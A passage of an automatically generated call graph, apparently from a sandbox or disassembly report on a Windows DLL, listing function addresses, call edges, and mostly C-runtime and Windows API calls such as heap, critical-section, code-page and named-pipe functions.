8617->8613 8617->8616 8618->8613 8620 7ffa535e4ae8 36 API calls 8619->8620 8621 7ffa535e4b8a 8620->8621 8621->8614 8621->8615 8622 7ffa535e5696 8624 7ffa535e56b9 _FXp_mulh 8622->8624 8623 7ffa535e56c7 8627 7ffa535e575f 8623->8627 8628 7ffa535e570f 8623->8628 8641 7ffa535e56d1 8623->8641 8624->8623 8625 7ffa535e56e1 8624->8625 8626 7ffa535e90cc _FXp_mulh 15 API calls 8625->8626 8626->8641 8629 7ffa535e5764 8627->8629 8634 7ffa535e5771 8627->8634 8643 7ffa535e545c 8628->8643 8631 7ffa535e55d8 15 API calls 8629->8631 8631->8641 8634->8641 8662 7ffa535ea4c4 8634->8662 8638 7ffa535e585f 8639 7ffa535e9570 15 API calls 8638->8639 8640 7ffa535e5877 8639->8640 8666 7ffa535e9728 8640->8666 8644 7ffa535e5473 _FXp_mulh 8643->8644 8645 7ffa535e5487 8644->8645 8646 7ffa535e554f 8644->8646 8649 7ffa535e549a 8644->8649 8645->8649 8673 7ffa535e506c 8645->8673 8647 7ffa535e90cc _FXp_mulh 15 API calls 8646->8647 8647->8649 8650 7ffa535e9570 8649->8650 8651 7ffa535e958c _FXp_mulh 8650->8651 8652 7ffa535e9597 8651->8652 8653 7ffa535e96e2 8651->8653 8655 7ffa535e573f 8652->8655 8656 7ffa535e90cc _FXp_mulh 15 API calls 8652->8656 8654 7ffa535e90cc _FXp_mulh 15 API calls 8653->8654 8654->8655 8657 7ffa535e55d8 8655->8657 8656->8655 8658 7ffa535e9570 15 API calls 8657->8658 8659 7ffa535e55f7 _FXp_mulh 8658->8659 8660 7ffa535e564b 8659->8660 8661 7ffa535e90cc _FXp_mulh 15 API calls 8659->8661 8660->8641 8661->8660 8663 7ffa535ea4e2 8662->8663 8665 7ffa535ea4e7 _FXp_mulh 8662->8665 8713 7ffa535ea640 8663->8713 8665->8638 8667 7ffa535e9746 _FXp_mulh 8666->8667 8668 7ffa535e977c 8667->8668 8670 7ffa535e9790 8667->8670 8671 7ffa535e9786 8667->8671 8669 7ffa535e90cc _FXp_mulh 15 API calls 8668->8669 8669->8671 8670->8671 8672 7ffa535e90cc _FXp_mulh 15 API calls 8670->8672 8671->8641 8672->8671 8674 7ffa535e50ba _FXp_mulh _FXp_setw 8673->8674 8685 7ffa535e50cb _FXp_mulh 8674->8685 8691 7ffa535e51a1 get_acsize _FXp_mulh _FXp_setw 8674->8691 8692 7ffa535e9c0c 8674->8692 8677 7ffa535e5421 8679 7ffa535f51e0 _FXp_mulh 8 API calls 8677->8679 8681 7ffa535e5437 8679->8681 8680 7ffa535e9c0c _FXp_mulh 23 API calls 8682 7ffa535e5248 8680->8682 8681->8649 8701 7ffa535e9b4c 8682->8701 8684 7ffa535e9c0c 23 API calls _FXp_mulh 8684->8691 8685->8677 8705 7ffa535ea718 8685->8705 8686 7ffa535e534e get_acsize _FXp_mulh 8686->8685 8687 7ffa535e9c0c _FXp_mulh 23 API calls 8686->8687 8689 7ffa535e53d9 8687->8689 8688 7ffa535e9b4c 15 API calls _FXp_addx 8688->8691 8690 7ffa535e9b4c _FXp_addx 15 API calls 8689->8690 8690->8685 8691->8684 8691->8686 8691->8688 8693 7ffa535e9c46 _FXp_mulh 8692->8693 8700 7ffa535e9c9b _FXp_mulh 8692->8700 8696 7ffa535e9c64 8693->8696 8693->8700 8694 7ffa535e9c76 8695 7ffa535f51e0 _FXp_mulh 8 API calls 8694->8695 8697 7ffa535e5218 8695->8697 8696->8694 8698 7ffa535e90cc _FXp_mulh 15 API calls 8696->8698 8697->8680 8697->8691 8698->8694 8699 7ffa535e97f8 15 API calls _FXp_mulh 8699->8700 8700->8694 8700->8699 8702 7ffa535e9b78 8701->8702 8703 7ffa535e9b9c 8701->8703 8702->8703 8709 7ffa535e97f8 8702->8709 8703->8691 8706 7ffa535ea782 8705->8706 8707 7ffa535f0c6c _handle_errorf 24 API calls 8706->8707 8708 7ffa535ea79c 8706->8708 8707->8708 8708->8677 8710 7ffa535e982c _FXp_mulh 8709->8710 8712 7ffa535e987b _FXp_mulh 8709->8712 8711 7ffa535e90cc _FXp_mulh 15 API calls 8710->8711 8710->8712 8711->8712 8712->8702 8716 7ffa535e9ea0 8713->8716 8715 7ffa535ea681 8715->8665 8717 7ffa535e9f0f _FXp_mulh 8716->8717 8718 7ffa535e9f9c 8717->8718 8720 7ffa535e9f7b _FXp_mulh 8717->8720 8723 7ffa535ea340 8717->8723 8722 7ffa535e9fad 8718->8722 8728 7ffa535e9fc2 _FXp_mulh _FXp_setw _fdlogpoly 8718->8728 8719 7ffa535f51e0 _FXp_mulh 8 API calls 8721 7ffa535ea3ba 8719->8721 8720->8719 8721->8715 8724 7ffa535e90cc _FXp_mulh 15 API calls 8722->8724 8723->8720 8725 7ffa535e90cc _FXp_mulh 15 API calls 8723->8725 8724->8720 8725->8720 8726 7ffa535ea0a6 8726->8720 8727 7ffa535e90cc _FXp_mulh 15 API calls 8726->8727 8727->8720 8728->8726 8729 7ffa535e9b4c _FXp_addx 15 API calls 8728->8729 8746 7ffa535ea0dd 8728->8746 8730 7ffa535ea169 8729->8730 8732 7ffa535e9c0c _FXp_mulh 23 API calls 8730->8732 8733 7ffa535ea176 _FXp_setw 8730->8733 8737 7ffa535ea19e 8732->8737 8734 7ffa535e97f8 _FXp_mulh 15 API calls 8733->8734 8736 7ffa535ea1ff _FXp_setw 8734->8736 8735 7ffa535e9c0c _FXp_mulh 23 API calls 8735->8737 8739 7ffa535e9c0c _FXp_mulh 23 API calls 8736->8739 8737->8733 8737->8735 8738 7ffa535e9b4c _FXp_addx 15 API calls 8737->8738 8738->8737 8740 7ffa535ea227 8739->8740 8741 7ffa535e9c0c _FXp_mulh 23 API calls 8740->8741 8744 7ffa535ea25a _FXp_mulh 8740->8744 8742 7ffa535ea248 8741->8742 8743 7ffa535e9b4c _FXp_addx 15 API calls 8742->8743 8743->8744 8745 7ffa535e97f8 _FXp_mulh 15 API calls 8744->8745 8745->8746 8747 7ffa535f0dcc 8746->8747 8748 7ffa535f0df7 _FXp_mulh 8747->8748 8749 7ffa535f0e1d 8748->8749 8752 7ffa535f0f29 8748->8752 8750 7ffa535f0e55 8749->8750 8751 7ffa535f0e3b 8749->8751 8756 7ffa535f0e5e _FXp_mulh 8749->8756 8750->8726 8753 7ffa535e90cc _FXp_mulh 15 API calls 8751->8753 8752->8750 8754 7ffa535f0f57 8752->8754 8752->8756 8753->8750 8754->8750 8755 7ffa535e90cc _FXp_mulh 15 API calls 8754->8755 8755->8750 8756->8750 8757 7ffa535e90cc _FXp_mulh 15 API calls 8756->8757 8757->8750 8758 7ffa535e4f98 8761 7ffa535e93e0 8758->8761 8760 7ffa535e4fa5 8762 7ffa535e940f _copysign _ctrlfp 8761->8762 8763 7ffa535e943e _ctrlfp 8762->8763 8765 7ffa535eb9a8 8762->8765 8763->8760 8766 7ffa535eb9f2 8765->8766 8767 7ffa535ebd48 _raise_excf RaiseException 8766->8767 8768 7ffa535eba31 _errcode _handle_error 8766->8768 8767->8768 8769 7ffa535eba6c 8768->8769 8770 7ffa535eba4b 8768->8770 8771 7ffa535ec07c _set_errno_from_matherr 15 API calls 8769->8771 8776 7ffa535ec0ac 8770->8776 8773 7ffa535eba6a _ctrlfp 8771->8773 8774 7ffa535f51e0 _FXp_mulh 8 API calls 8773->8774 8775 7ffa535eba91 8774->8775 8775->8763 8777 7ffa535ec0cc 8776->8777 8778 7ffa535ec165 _ctrlfp 8777->8778 8780 7ffa535ec109 _ctrlfp _handle_error 8777->8780 8779 7ffa535ec07c _set_errno_from_matherr 15 API calls 8778->8779 8781 7ffa535ec15d 8779->8781 8780->8781 8782 7ffa535ec07c _set_errno_from_matherr 15 API calls 8780->8782 8781->8773 8782->8781 8250 7ffa535e7014 8257 7ffa535e7e30 8250->8257 8258 7ffa535e8a30 abort 36 API calls 8257->8258 8261 7ffa535e7e3b 8258->8261 8259 7ffa535e7f58 abort 36 API calls 8260 7ffa535e7e56 8259->8260 8261->8259 8262 7ffa535e3314 8264 7ffa535e3338 __scrt_acquire_startup_lock 8262->8264 8263 7ffa535e6d39 8264->8263 8265 7ffa535e8ac4 _get_daylight 15 API calls 8264->8265 8266 7ffa535e6d62 8265->8266 8267 7ffa535efc10 8268 7ffa535efc3a 8267->8268 8269 7ffa535e7fb0 __vcrt_getptd_noexit 15 API calls 8268->8269 8270 7ffa535efc59 8269->8270 8271 7ffa535e7e58 __vcrt_freeptd 15 API calls 8270->8271 8272 7ffa535efc67 8271->8272 8273 7ffa535e7fb0 __vcrt_getptd_noexit 15 API calls 8272->8273 8276 7ffa535efc91 8272->8276 8275 7ffa535efc83 8273->8275 8277 7ffa535e7e58 __vcrt_freeptd 15 API calls 8275->8277 8278 7ffa535efc9a 8276->8278 8279 7ffa535edb18 8276->8279 8277->8276 8280 7ffa535ed718 __vcrt_uninitialize_ptd 5 API calls 8279->8280 8281 7ffa535edb53 8280->8281 8282 7ffa535edb70 InitializeCriticalSectionAndSpinCount 8281->8282 8283 7ffa535edb5b 8281->8283 8282->8283 8283->8276 8786 7ffa535e4d90 8787 7ffa535e4d98 8786->8787 8788 7ffa535e4ae8 36 API calls 8787->8788 8789 7ffa535e4daa 8788->8789 8791 7ffa535e4db8 8789->8791 8792 7ffa535e4cfc 8789->8792 8793 7ffa535e4d26 8792->8793 8794 7ffa535e4d22 8792->8794 8795 7ffa535e8c80 40 API calls 8793->8795 8794->8791 8795->8794 8284 7ffa535f210c 8285 7ffa535f2120 8284->8285 8286 7ffa535f21a3 8285->8286 8288 7ffa535f0b44 8285->8288 8289 7ffa535f0b84 _ctrlfp _handle_error 8288->8289 8291 7ffa535f0bf0 _handle_error 8289->8291 8299 7ffa535ebd20 8289->8299 8292 7ffa535f0c2d 8291->8292 8293 7ffa535f0bfd 8291->8293 8294 7ffa535ec07c _set_errno_from_matherr 15 API calls 8292->8294 8295 7ffa535f0a20 _handle_error 15 API calls 8293->8295 8296 7ffa535f0c2b _ctrlfp 8294->8296 8295->8296 8297 7ffa535f51e0 _FXp_mulh 8 API calls 8296->8297 8298 7ffa535f0c55 8297->8298 8298->8286 8300 7ffa535ebd48 _raise_excf RaiseException 8299->8300 8301 7ffa535ebd42 8300->8301 8301->8291 8796 7ffa535fb98d 8797 7ffa535fb99f 8796->8797 8798 7ffa535fb9a9 8796->8798 8800 7ffa535ed6fc LeaveCriticalSection 8797->8800 8302 7ffa535e320c 8303 7ffa535e3228 8302->8303 8304 7ffa535e322d 8302->8304 8306 7ffa535e3628 8303->8306 8307 7ffa535e36bf 8306->8307 8308 7ffa535e3650 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8306->8308 8307->8304 8308->8307 8309 7ffa535e4e0c 8310 7ffa535e4e14 8309->8310 8311 7ffa535e4e29 8310->8311 8313 7ffa535e4e42 8310->8313 8312 7ffa535e8380 _get_daylight 15 API calls 8311->8312 8314 7ffa535e4e2e 8312->8314 8315 7ffa535e4ae8 36 API calls 8313->8315 8316 7ffa535e8260 _invalid_parameter_noinfo 32 API calls 8314->8316 8317 7ffa535e4e39 8315->8317 8316->8317 8805 7ffa535e8b64 8812 7ffa535ed9a8 8805->8812 8808 7ffa535e8b7f 8809 7ffa535e8ac4 _get_daylight 15 API calls 8810 7ffa535e8b88 8809->8810 8810->8808 8811 7ffa535e8ba0 __vcrt_uninitialize_ptd 6 API calls 8810->8811 8811->8808 8813 7ffa535ed718 __vcrt_uninitialize_ptd 5 API calls 8812->8813 8814 7ffa535ed9d4 8813->8814 8815 7ffa535ed9ec TlsAlloc 8814->8815 8816 7ffa535e8b74 8814->8816 8815->8816 8816->8808 8816->8809 8318 7ffa535f12e5 8319 7ffa535f1316 8318->8319 8320 7ffa535f14ac 8318->8320 8319->8320 8321 7ffa535f1497 8319->8321 8324 7ffa535f134e 8319->8324 8323 7ffa535f22a8 _log_special 24 API calls 8320->8323 8325 7ffa535f14aa 8320->8325 8326 7ffa535f22a8 8321->8326 8323->8325 8329 7ffa535f22c8 8326->8329 8330 7ffa535f22e2 8329->8330 8331 7ffa535f22c3 8330->8331 8332 7ffa535f0c6c _handle_errorf 24 API calls 8330->8332 8331->8325 8332->8331 8333 7ffa535fb9e3 8336 7ffa535efd98 LeaveCriticalSection 8333->8336 8337 7ffa535e36e4 8338 7ffa535e4378 InterlockedFlushSList 8337->8338 8339 7ffa535e4389 8338->8339 8340 7ffa535e439c 8338->8340 8339->8340 8341 7ffa535e7e58 __vcrt_freeptd 15 API calls 8339->8341 8341->8339 8817 7ffa535ed660 8818 7ffa535ed668 8817->8818 8819 7ffa535edb18 6 API calls 8818->8819 8820 7ffa535ed699 8818->8820 8821 7ffa535ed695 8818->8821 8819->8818 8823 7ffa535ed6c4 8820->8823 8824 7ffa535ed6ef 8823->8824 8825 7ffa535ed6d2 DeleteCriticalSection 8824->8825 8826 7ffa535ed6f3 8824->8826 8825->8824 8826->8821 8827 7ffa535e545e 8828 7ffa535e5473 _FXp_mulh 8827->8828 8829 7ffa535e5487 8828->8829 8830 7ffa535e554f 8828->8830 8833 7ffa535e549a 8828->8833 8832 7ffa535e506c 24 API calls 8829->8832 8829->8833 8831 7ffa535e90cc _FXp_mulh 15 API calls 8830->8831 8831->8833 8832->8833 8342 7ffa535e6ee0 8343 7ffa535e6f06 GetModuleHandleW 8342->8343 8344 7ffa535e6f50 8342->8344 8343->8344 8348 7ffa535e6f13 8343->8348 8360 7ffa535ed6a8 EnterCriticalSection 8344->8360 8348->8344 8355 7ffa535e7098 GetModuleHandleExW 8348->8355 8356 7ffa535e70dc 8355->8356 8357 7ffa535e70c2 GetProcAddress 8355->8357 8358 7ffa535e70f9 8356->8358 8359 7ffa535e70f3 FreeLibrary 8356->8359 8357->8356 8358->8344 8359->8358 8838 7ffa535fb25c 8839 7ffa535fb2b3 GetCurrentThreadId 8838->8839 8840 7ffa535fb2c3 8838->8840 8839->8840 8361 7ffa535f14f9 8362 7ffa535f14ac 8361->8362 8363 7ffa535f14bf 8362->8363 8364 7ffa535f22a8 _log_special 24 API calls 8362->8364 8364->8363 8365 7ffa535e1cf8 8366 7ffa535e1d6f 8365->8366 8367 7ffa535e1d87 GetCurrentThreadId 8366->8367 8374 7ffa535e1fb9 8366->8374 8368 7ffa535e1d9e 8367->8368 8367->8374 8377 7ffa535f5694 8368->8377 8370 7ffa535e1e53 8371 7ffa535e1fcf 8370->8371 8372 7ffa535e1e7e 8370->8372 8370->8374 8371->8374 8389 7ffa535f615c 8371->8389 8372->8374 8383 7ffa535f59e8 8372->8383 8378 7ffa535f5727 8377->8378 8379 7ffa535f58d1 8377->8379 8381 7ffa535f615c 3 API calls 8378->8381 8380 7ffa535f615c 3 API calls 8379->8380 8382 7ffa535f578a 8380->8382 8381->8382 8382->8370 8385 7ffa535f5aaf 8383->8385 8388 7ffa535f5ad4 8383->8388 8384 7ffa535f5f42 __scrt_fastfail 8384->8374 8387 7ffa535f5eb8 SetFileAttributesA 8385->8387 8385->8388 8386 7ffa535f615c 3 API calls 8386->8388 8387->8385 8387->8387 8388->8384 8388->8386 8390 7ffa535f6220 8389->8390 8391 7ffa535e206b WaitNamedPipeA 8389->8391 8390->8391 8392 7ffa535f6347 DisconnectNamedPipe 8390->8392 8393 7ffa535f637b 8390->8393 8391->8371 8391->8374 8392->8393 8393->8391 8394 7ffa535f9404 2 API calls 8393->8394 8394->8391 8841 7ffa535fb873 __scrt_dllmain_exception_filter 8842 7ffa535f1673 8843 7ffa535f22a8 _log_special 24 API calls 8842->8843 8844 7ffa535f1688 8843->8844 8395 7ffa535f21f0 8398 7ffa535f2210 8395->8398 8399 7ffa535f222a 8398->8399 8400 7ffa535f220b 8399->8400 8401 7ffa535f0b44 _handle_error 24 API calls 8399->8401 8401->8400 8402 7ffa535e40f0 8404 7ffa535e412e _IsNonwritableInCurrentImage __C_specific_handler 8402->8404 8403 7ffa535e4211 8404->8403 8405 7ffa535e41dc RtlUnwindEx 8404->8405 8405->8404 8845 7ffa535e886c 8846 7ffa535e8871 8845->8846 8847 7ffa535e8886 8845->8847 8848 7ffa535e888c Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 8846->8848 8849 7ffa535e887e 8848->8849 8850 7ffa535e7e58 __vcrt_freeptd 15 API calls 8849->8850 8850->8847 8406 7ffa535f20eb 8407 7ffa535f20f6 8406->8407 8409 7ffa535f20f9 8406->8409 8408 7ffa535f21a3 8409->8408 8410 7ffa535f0b44 _handle_error 24 API calls 8409->8410 8410->8408 8851 7ffa535f466b 8852 7ffa535f4910 8851->8852 8853 7ffa535f46ab 8851->8853 8854 7ffa535f4906 8852->8854 8858 7ffa535f21d0 _log10_special 24 API calls 8852->8858 8853->8852 8855 7ffa535f46df 8853->8855 8856 7ffa535f48f2 8853->8856 8859 7ffa535f21d0 8856->8859 8858->8854 8860 7ffa535f2210 _log10_special 24 API calls 8859->8860 8861 7ffa535f21eb 8860->8861 8861->8854 8411 7ffa535ee2c8 8412 7ffa535ee2e9 8411->8412 8413 7ffa535ee2f0 8411->8413 8414 7ffa535ee329 8413->8414 8415 7ffa535ee2f7 8413->8415 8414->8412 8422 7ffa535ef334 8414->8422 8416 7ffa535e7fb0 __vcrt_getptd_noexit 15 API calls 8415->8416 8417 7ffa535ee302 8416->8417 8419 7ffa535e7e58 __vcrt_freeptd 15 API calls 8417->8419 8419->8412 8420 7ffa535ee354 8421 7ffa535e7e58 __vcrt_freeptd 15 API calls 8420->8421 8421->8412 8423 7ffa535ef33c 8422->8423 8424 7ffa535ef37b 8423->8424 8425 7ffa535ef36c 8423->8425 8426 7ffa535ef385 8424->8426 8431 7ffa535f2ec8 8424->8431 8427 7ffa535e8380 _get_daylight 15 API calls 8425->8427 8438 7ffa535f2f04 8426->8438 8430 7ffa535ef371 __scrt_fastfail 8427->8430 8430->8420 8432 7ffa535f2ed1 8431->8432 8433 7ffa535f2eea HeapSize 8431->8433 8434 7ffa535e8380 _get_daylight 15 API calls 8432->8434 8435 7ffa535f2ed6 8434->8435 8436 7ffa535e8260 _invalid_parameter_noinfo 32 API calls 8435->8436 8437 7ffa535f2ee1 8436->8437 8437->8426 8439 7ffa535f2f19 8438->8439 8440 7ffa535f2f23 8438->8440 8441 7ffa535e7e98 _onexit 16 API calls 8439->8441 8442 7ffa535f2f28 8440->8442 8448 7ffa535f2f2f __vcrt_getptd_noexit 8440->8448 8447 7ffa535f2f21 8441->8447 8443 7ffa535e7e58 __vcrt_freeptd 15 API calls 8442->8443 8443->8447 8444 7ffa535f2f6e 8446 7ffa535e8380 _get_daylight 15 API calls 8444->8446 8445 7ffa535f2f58 HeapReAlloc 8445->8447 8445->8448 8446->8447 8447->8430 8448->8444 8448->8445 8449 7ffa535ef4e8 __vcrt_getptd_noexit 2 API calls 8448->8449 8449->8448 8454 7ffa535f12c6 8455 7ffa535f3550 24 API calls 8454->8455 8456 7ffa535f12d2 8455->8456 8456->8456 7194 7ffa535e74c8 7195 7ffa535e74e5 7194->7195 7196 7ffa535e74dc 7194->7196 7196->7195 7200 7ffa535e7510 7196->7200 7201 7ffa535e7529 7200->7201 7202 7ffa535e74ee 7200->7202 7221 7ffa535eea94 7201->7221 7202->7195 7212 7ffa535e76bc 7202->7212 7207 7ffa535e753b 7210 7ffa535e7e58 __vcrt_freeptd 15 API calls 7207->7210 7210->7202 7214 7ffa535e76db 7212->7214 7216 7ffa535e7712 7212->7216 7213 7ffa535e76e3 WideCharToMultiByte 7213->7214 7213->7216 7214->7195 7215 7ffa535e7fb0 __vcrt_getptd_noexit 15 API calls 7215->7216 7216->7213 7216->7214 7216->7215 7217 7ffa535e7727 WideCharToMultiByte 7216->7217 7218 7ffa535e7782 7216->7218 7220 7ffa535e7e58 __vcrt_freeptd 15 API calls 7216->7220 7217->7216 7217->7218 7219 7ffa535e7e58 __vcrt_freeptd 15 API calls 7218->7219 7219->7214 7220->7216 7222 7ffa535e752e 7221->7222 7223 7ffa535eeaa1 7221->7223 7225 7ffa535eee4c GetEnvironmentStringsW 7222->7225 7260 7ffa535ee8dc 7223->7260 7226 7ffa535eef1e 7225->7226 7227 7ffa535eee7a WideCharToMultiByte 7225->7227 7230 7ffa535eef28 FreeEnvironmentStringsW 7226->7230 7231 7ffa535e7533 7226->7231 7227->7226 7229 7ffa535eeed4 7227->7229 7232 7ffa535e7e98 _onexit 16 API calls 7229->7232 7230->7231 7231->7207 7237 7ffa535e757c 7231->7237 7233 7ffa535eeedc 7232->7233 7234 7ffa535eeee4 WideCharToMultiByte 7233->7234 7235 7ffa535eef0b 7233->7235 7234->7235 7236 7ffa535e7e58 __vcrt_freeptd 15 API calls 7235->7236 7236->7226 7238 7ffa535e759d 7237->7238 7239 7ffa535e7fb0 __vcrt_getptd_noexit 15 API calls 7238->7239 7240 7ffa535e75cb 7239->7240 7242 7ffa535e763a 7240->7242 7244 7ffa535e7fb0 __vcrt_getptd_noexit 15 API calls 7240->7244 7245 7ffa535e762b 7240->7245 7250 7ffa535e7662 7240->7250 7252 7ffa535e7e58 __vcrt_freeptd 15 API calls 7240->7252 7593 7ffa535e7ef8 7240->7593 7241 7ffa535e7e58 __vcrt_freeptd 15 API calls 7243 7ffa535e7548 7241->7243 7242->7241 7254 7ffa535e7e58 7243->7254 7244->7240 7602 7ffa535e7678 7245->7602 7249 7ffa535e7e58 __vcrt_freeptd 15 API calls 7249->7242 7251 7ffa535e8280 _isindst 17 API calls 7250->7251 7253 7ffa535e7674 7251->7253 7252->7240 7255 7ffa535e7e8d __vcrt_freeptd 7254->7255 7256 7ffa535e7e5d HeapFree 7254->7256 7255->7207 7256->7255 7257 7ffa535e7e78 7256->7257 7258 7ffa535e8380 _get_daylight 13 API calls 7257->7258 7259 7ffa535e7e7d GetLastError 7258->7259 7259->7255 7280 7ffa535e8a30 GetLastError 7260->7280 7262 7ffa535ee8f5 7300 7ffa535eeabc 7262->7300 7267 7ffa535ee918 7267->7222 7270 7ffa535e7e58 __vcrt_freeptd 15 API calls 7270->7267 7273 7ffa535ee9bf 7335 7ffa535e8380 7273->7335 7275 7ffa535eea21 7279 7ffa535ee9c4 7275->7279 7338 7ffa535ee398 7275->7338 7276 7ffa535ee9e4 7276->7275 7277 7ffa535e7e58 __vcrt_freeptd 15 API calls 7276->7277 7277->7275 7279->7270 7281 7ffa535e8a4d 7280->7281 7282 7ffa535e8a52 7280->7282 7345 7ffa535eda58 7281->7345 7287 7ffa535e8a9b 7282->7287 7350 7ffa535e7fb0 7282->7350 7286 7ffa535e8a71 7291 7ffa535e7e58 __vcrt_freeptd 15 API calls 7286->7291 7289 7ffa535e8ab6 SetLastError 7287->7289 7290 7ffa535e8aa0 SetLastError 7287->7290 7367 7ffa535e7f58 7289->7367 7290->7262 7294 7ffa535e8a78 7291->7294 7294->7289 7295 7ffa535e8a8f 7362 7ffa535e879c 7295->7362 7301 7ffa535e8a30 abort 36 API calls 7300->7301 7302 7ffa535eeacb 7301->7302 7303 7ffa535eeae6 7302->7303 7498 7ffa535ed6a8 EnterCriticalSection 7302->7498 7305 7ffa535ee8fe 7303->7305 7308 7ffa535e7f58 abort 36 API calls 7303->7308 7311 7ffa535ee5e8 7305->7311 7308->7305 7499 7ffa535e4ae8 7311->7499 7314 7ffa535ee608 GetOEMCP 7316 7ffa535ee62f 7314->7316 7315 7ffa535ee61a 7315->7316 7317 7ffa535ee61f GetACP 7315->7317 7316->7267 7318 7ffa535e7e98 7316->7318 7317->7316 7319 7ffa535e7ee3 7318->7319 7323 7ffa535e7ea7 __vcrt_getptd_noexit 7318->7323 7321 7ffa535e8380 _get_daylight 15 API calls 7319->7321 7320 7ffa535e7eca RtlAllocateHeap 7322 7ffa535e7ee1 7320->7322 7320->7323 7321->7322 7322->7279 7325 7ffa535eeb7c 7322->7325 7323->7319 7323->7320 7324 7ffa535ef4e8 __vcrt_getptd_noexit 2 API calls 7323->7324 7324->7323 7326 7ffa535ee5e8 38 API calls 7325->7326 7329 7ffa535eeba9 7326->7329 7327 7ffa535eebb1 7332 7ffa535f51e0 _FXp_mulh 8 API calls 7327->7332 7328 7ffa535eec19 __scrt_fastfail 7527 7ffa535ee6f8 GetCPInfo 7328->7527 7329->7327 7329->7328 7330 7ffa535eebf3 IsValidCodePage 7329->7330 7330->7327 7331 7ffa535eec04 GetCPInfo 7330->7331 7331->7327 7331->7328 7333 7ffa535ee9b8 7332->7333 7333->7273 7333->7276 7336 7ffa535e8ac4 _get_daylight 15 API calls 7335->7336 7337 7ffa535e8389 7336->7337 7337->7279 7592 7ffa535ed6a8 EnterCriticalSection 7338->7592 7376 7ffa535ed718 7345->7376 7348 7ffa535eda9a TlsGetValue 7349 7ffa535eda8b 7348->7349 7349->7282 7355 7ffa535e7fc1 __vcrt_getptd_noexit 7350->7355 7351 7ffa535e8012 7354 7ffa535e8380 _get_daylight 14 API calls 7351->7354 7352 7ffa535e7ff6 RtlAllocateHeap 7353 7ffa535e8010 7352->7353 7352->7355 7353->7286 7357 7ffa535edab0 7353->7357 7354->7353 7355->7351 7355->7352 7385 7ffa535ef4e8 7355->7385 7358 7ffa535ed718 __vcrt_uninitialize_ptd 5 API calls 7357->7358 7359 7ffa535edae3 7358->7359 7360 7ffa535edafd TlsSetValue 7359->7360 7361 7ffa535e8a88 7359->7361 7360->7361 7361->7286 7361->7295 7394 7ffa535e871c 7362->7394 7408 7ffa535ef5a4 7367->7408 7377 7ffa535ed779 7376->7377 7380 7ffa535ed774 7376->7380 7377->7348 7377->7349 7378 7ffa535ed7a1 LoadLibraryExW 7378->7380 7381 7ffa535ed7c2 GetLastError 7378->7381 7379 7ffa535ed834 GetProcAddress 7379->7377 7380->7377 7380->7378 7382 7ffa535ed826 7380->7382 7384 7ffa535ed80b FreeLibrary 7380->7384 7381->7380 7383 7ffa535ed7cd LoadLibraryExW 7381->7383 7382->7377 7382->7379 7383->7380 7384->7380 7388 7ffa535ef528 7385->7388 7393 7ffa535ed6a8 EnterCriticalSection 7388->7393 7406 7ffa535ed6a8 EnterCriticalSection 7394->7406 7442 7ffa535ef55c 7408->7442 7447 7ffa535ed6a8 EnterCriticalSection 7442->7447 7500 7ffa535e4b03 7499->7500 7501 7ffa535e4afe 7499->7501 7500->7501 7502 7ffa535e8a30 abort 36 API calls 7500->7502 7501->7314 7501->7315 7503 7ffa535e4b20 7502->7503 7507 7ffa535e8bc4 7503->7507 7508 7ffa535e8bd9 7507->7508 7510 7ffa535e4b44 7507->7510 7508->7510 7515 7ffa535f03f4 7508->7515 7511 7ffa535e8bf8 7510->7511 7512 7ffa535e8c20 7511->7512 7513 7ffa535e8c0d 7511->7513 7512->7501 7513->7512 7514 7ffa535eeabc 36 API calls 7513->7514 7514->7512 7516 7ffa535e8a30 abort 36 API calls 7515->7516 7517 7ffa535f0403 7516->7517 7525 7ffa535f0455 7517->7525 7526 7ffa535ed6a8 EnterCriticalSection 7517->7526 7525->7510 7528 7ffa535ee741 7527->7528 7536 7ffa535ee821 7527->7536 7537 7ffa535e8c80 7528->7537 7531 7ffa535f51e0 _FXp_mulh 8 API calls 7533 7ffa535ee8c5 7531->7533 7533->7327 7535 7ffa535f2d18 41 API calls 7535->7536 7536->7531 7538 7ffa535e4ae8 36 API calls 7537->7538 7539 7ffa535e8cc2 MultiByteToWideChar 7538->7539 7541 7ffa535e8d07 7539->7541 7542 7ffa535e8d00 7539->7542 7543 7ffa535e7e98 _onexit 16 API calls 7541->7543 7546 7ffa535e8d35 __scrt_fastfail 7541->7546 7544 7ffa535f51e0 _FXp_mulh 8 API calls 7542->7544 7543->7546 7545 7ffa535e8e17 7544->7545 7551 7ffa535f2d18 7545->7551 7547 7ffa535e8da5 MultiByteToWideChar 7546->7547 7548 7ffa535e8de0 7546->7548 7547->7548 7549 7ffa535e8dc6 GetStringTypeW 7547->7549 7548->7542 7550 7ffa535e7e58 __vcrt_freeptd 15 API calls 7548->7550 7549->7548 7550->7542 7552 7ffa535e4ae8 36 API calls 7551->7552 7553 7ffa535f2d3d 7552->7553 7556 7ffa535f29bc 7553->7556 7557 7ffa535f29fe 7556->7557 7558 7ffa535f2a22 MultiByteToWideChar 7557->7558 7559 7ffa535f2a54 7558->7559 7560 7ffa535f2ccd 7558->7560 7564 7ffa535f2a8c 7559->7564 7565 7ffa535e7e98 _onexit 16 API calls 7559->7565 7561 7ffa535f51e0 _FXp_mulh 8 API calls 7560->7561 7562 7ffa535ee7e8 7561->7562 7562->7535 7563 7ffa535f2af0 MultiByteToWideChar 7566 7ffa535f2b16 7563->7566 7569 7ffa535f2ba1 7563->7569 7564->7563 7564->7569 7565->7564 7583 7ffa535edb90 7566->7583 7569->7560 7570 7ffa535e7e58 __vcrt_freeptd 15 API calls 7569->7570 7570->7560 7571 7ffa535f2bb0 7573 7ffa535f2bdb 7571->7573 7574 7ffa535e7e98 _onexit 16 API calls 7571->7574 7572 7ffa535f2b5e 7572->7569 7575 7ffa535edb90 6 API calls 7572->7575 7573->7569 7576 7ffa535edb90 6 API calls 7573->7576 7574->7573 7575->7569 7577 7ffa535f2c6e 7576->7577 7578 7ffa535f2ca4 7577->7578 7579 7ffa535f2c98 WideCharToMultiByte 7577->7579 7578->7569 7580 7ffa535e7e58 __vcrt_freeptd 15 API calls 7578->7580 7579->7578 7581 7ffa535f2d04 7579->7581 7580->7569 7581->7569 7582 7ffa535e7e58 __vcrt_freeptd 15 API calls 7581->7582 7582->7569 7584 7ffa535ed718 __vcrt_uninitialize_ptd 5 API calls 7583->7584 7585 7ffa535edbd3 7584->7585 7588 7ffa535edbdb 7585->7588 7589 7ffa535edc80 7585->7589 7587 7ffa535edc3c LCMapStringW 7587->7588 7588->7569 7588->7571 7588->7572 7590 